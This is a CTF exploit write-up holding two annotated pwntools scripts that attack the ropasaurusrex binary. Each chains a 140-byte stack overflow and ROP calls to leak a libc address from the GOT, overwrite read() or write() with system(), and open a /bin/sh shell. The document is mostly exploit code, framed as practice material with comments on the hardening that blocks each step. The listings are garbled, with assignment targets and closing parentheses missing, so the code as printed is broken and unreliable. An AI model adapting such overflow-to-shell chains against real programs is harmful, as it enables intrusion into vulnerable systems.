ropasaurusrex


[*] read leak Exploit


# Walk-through of a classic overflow -> ROP -> GOT-overwrite chain against the
# ropasaurusrex CTF binary (the "read leak" variant: it leaks read()'s libc address).
# The page's rendering dropped the assignment targets on the three lines below and
# the closing parentheses on the `r.read`/`r.write`/`r.raw` lines, so the listing is
# not runnable as shown. The string-typed payloads suggest Python 2-era pwntools.
#
# What the chain depends on, and the hardening that removes each dependency:
#   - an unchecked 140-byte copy reaching the saved return address -> stack canaries
#   - a GOT that the program's own read() can overwrite                -> full RELRO
#   - fixed addresses for the gadget, PLT/GOT and .bss (non-PIE binary) -> PIE + ASLR
#   - a libc function pointer readable via write()                       -> the leak
#     is what defeats libc ASLR; without it the offset arithmetic below fails.
from pwn import *
 
# Target process, binary metadata (PLT/GOT/.bss addresses) and ROP chain builder.
= process('./ropasaurusrex')
= ELF('./ropasaurusrex')
= ROP(e)
 
pop3ret = 0x80484b6  # gadget address hard-coded: only valid for this non-PIE build
read_plt = e.plt['read']
read_got = e.got['read']
write_plt = e.plt['write']
write_got = e.got['write']
# Distance between read() and system() inside libc. This value is specific to the
# libc build the author ran against; any other libc build has a different one.
read_system_offset = 0x9ad60 # read - system
bss = e.bss()  # writable scratch memory at a fixed address, used to hold "/bin/sh\x00"
 
payload = 'A'*140 # buf + sfp -> ret
# Stage 1: read(0, bss, 8) copies the "/bin/sh\x00" sent later from stdin into .bss.
r.read(0,bss,8# /bin/sh\x00 
# Stage 2: write(1, read_got, 4) prints read()'s resolved libc address (the info leak).
r.write(1,read_got,4# leak
# Stage 3: read(0, read_got, 4) replaces read()'s GOT slot with the 4 bytes sent later.
r.read(0,read_got,4# system
# Stage 4: a call through read@plt now lands on whatever stage 3 wrote into the slot.
r.raw(read_plt) # read_plt execute -> .got -> system
# Placeholder return address for that final call, followed by its single argument.
r.raw('AAAA'# dummy
r.raw(bss) # /bin/sh
payload += str(r)
 
p.send(payload)
p.send('/bin/sh\x00')  # consumed by the stage-1 read()
 
sleep(1)  # crude wait for the stage-2 output to arrive before reading it
 
read = u32(p.recv())  # the 4 leaked bytes from stage 2
system = read - read_system_offset  # libc base is never computed; the offset is applied directly
 
p.send(p32(system))  # consumed by the stage-3 read(): this is what patches the GOT slot
 
p.interactive()



[*] write leak Exploit



# Same overflow -> ROP -> GOT-overwrite chain as the "read leak" script, but the
# leaked and overwritten GOT slot is write()'s instead of read()'s, and the final
# call goes through write@plt. The page's rendering dropped the assignment targets
# on the lines below and the closing parentheses on the `r.read`/`r.write`/`r.raw`
# lines, so the listing is not runnable as shown.
#
# Hardening that breaks each step: stack canaries (the 140-byte overwrite of the
# return address), full RELRO (the GOT write), PIE + ASLR (the hard-coded gadget
# and fixed PLT/GOT/.bss addresses), and denying the libc pointer leak that the
# offset arithmetic below relies on.
from pwn import *
 
= ELF('./ropasaurusrex')
# lib = ELF('/lib/x86_64-linux-gnu/libc.so.6')
= ROP(e)
= process('./ropasaurusrex')
#ibrop = ROP("/lib/x86_64-linux-gnu/libc.so.6",checksec=False)
# NOTE(review): the two commented-out lines above point at a 64-bit libc, while the
# target appears to be 32-bit (u32/p32, 0x0804... addresses) — they were never used.
 
pop3ret = 0x80484b6  # gadget address hard-coded: only valid for this non-PIE build
read_plt = e.plt['read']
write_plt = e.plt['write']
read_got = e.got['read']
write_got = e.got['write']
# Distance between write() and system() inside libc; specific to one libc build.
write_system_offset = 0x9add0 # write - system
bss = e.bss()  # writable scratch memory at a fixed address, used to hold "/bin/sh\x00"
 
payload = 'A'*140  # overflow reaching the saved return address (buf + saved frame pointer)
# Stage 1: read(0, bss, 8) copies the "/bin/sh\x00" sent later from stdin into .bss.
r.read(0,bss,8# /bin/sh -> bss
# Stage 2: write(1, write_got, 4) prints write()'s resolved libc address (the info leak).
r.write(1,write_got,4# write leak
# Stage 3: read(0, write_got, 4) replaces write()'s GOT slot with the 4 bytes sent later.
r.read(0,write_got,4# write_got -> system
# Stage 4: a call through write@plt now lands on whatever stage 3 wrote into the slot.
r.raw(write_plt) # system
# Placeholder return address for that final call, followed by its single argument.
r.raw('AAAA'# dummy
r.raw(bss) # /bin/sh
payload += str(r)
 
p.send(payload)
p.send('/bin/sh\x00')  # consumed by the stage-1 read()
 
sleep(1)  # crude wait for the stage-2 output to arrive before reading it
 
write = u32(p.recv())  # the 4 leaked bytes from stage 2
system = write - write_system_offset  # offset applied directly; no libc base is computed
 
p.send(p32(system))  # consumed by the stage-3 read(): this is what patches the GOT slot
 
p.interactive()

